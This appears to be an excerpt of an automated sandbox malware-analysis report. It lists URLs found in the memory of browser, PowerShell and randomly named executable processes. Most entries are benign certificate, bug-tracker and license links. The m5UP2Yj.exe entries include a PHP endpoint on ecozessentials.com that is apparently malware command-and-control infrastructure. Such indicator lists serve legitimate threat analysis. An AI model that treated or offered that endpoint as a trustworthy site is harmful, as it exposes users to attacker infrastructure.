Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906D
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906E
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692T
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878J
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524615543.000078C402A1C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2479655469.0000693C025A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524615543.000078C402A1C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215Y
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: chrome.exe, 00000022.00000002.2523168058.000078C40281C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: powershell.exe, 00000020.00000002.2343685115.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: m5UP2Yj.exe, 0000000F.00000002.2158683213.000000000189E000.00000004.00000020.00020000.00000000.sdmp, m5UP2Yj.exe, 0000000F.00000002.2158683213.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecozessentials.com
Source: m5UP2Yj.exe, 0000000F.00000002.2158683213.000000000189E000.00000004.00000020.00020000.00000000.sdmp, m5UP2Yj.exe, 0000000F.00000002.2158683213.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecozessentials.com/
Source: m5UP2Yj.exe, 0000000F.00000002.2158683213.00000000018E6000.00000004.00000020.00020000.00000000.sdmp, m5UP2Yj.exe, 0000000F.00000002.2158683213.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecozessentials.com/e6cb1c8fc7cd1659.php
Source: m5UP2Yj.exe, 0000000F.00000002.2158683213.00000000018E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecozessentials.com/e6cb1c8fc7cd1659.php4
Source: m5UP2Yj.exe, 0000000F.00000002.2158683213.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecozessentials.com/e6cb1c8fc7cd1659.phpl;0
Source: m5UP2Yj.exe, 0000000F.00000002.2158683213.00000000018E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecozessentials.com/e6cb1c8fc7cd1659.phpm
Source: m5UP2Yj.exe, 0000000F.00000002.2158683213.00000000018E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecozessentials.com/e6cb1c8fc7cd1659.phpw
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000022.00000003.2329413465.000078C403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2330164736.000078C403294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329835201.000078C403138000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329717073.000078C403278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: powershell.exe, 00000020.00000002.2377073806.0000000005D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2687444169.0000000005D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net02
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000020.00000002.2357011977.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2391431068.0000000007410000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2595388076.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: chrome.exe, 00000022.00000003.2333454752.000078C4032F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329413465.000078C403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332600137.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333620736.000078C40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2330164736.000078C403294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329789534.000078C4032C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333066892.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332697748.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525409166.000078C402BBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332807127.000078C403160000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329835201.000078C403138000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329717073.000078C403278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000022.00000003.2333454752.000078C4032F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329413465.000078C403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332600137.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333620736.000078C40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2330164736.000078C403294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329789534.000078C4032C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333066892.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332697748.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525409166.000078C402BBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332807127.000078C403160000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329835201.000078C403138000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329717073.000078C403278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000022.00000003.2333454752.000078C4032F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329413465.000078C403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332600137.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333620736.000078C40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2330164736.000078C403294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329789534.000078C4032C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333066892.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332697748.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525409166.000078C402BBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332807127.000078C403160000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329835201.000078C403138000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329717073.000078C403278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000022.00000003.2333454752.000078C4032F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329413465.000078C403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332600137.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333620736.000078C40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2330164736.000078C403294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329789534.000078C4032C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2333066892.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332697748.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525409166.000078C402BBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2332807127.000078C403160000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329835201.000078C403138000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2329717073.000078C403278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000022.00000002.2525308278.000078C402B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: powershell.exe, 00000020.00000002.2357011977.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2595388076.0000000004D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 00000022.00000002.2526012756.000078C402BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: powershell.exe, 00000020.00000002.2391431068.0000000007410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: powershell.exe, 00000020.00000002.2357011977.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2595388076.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
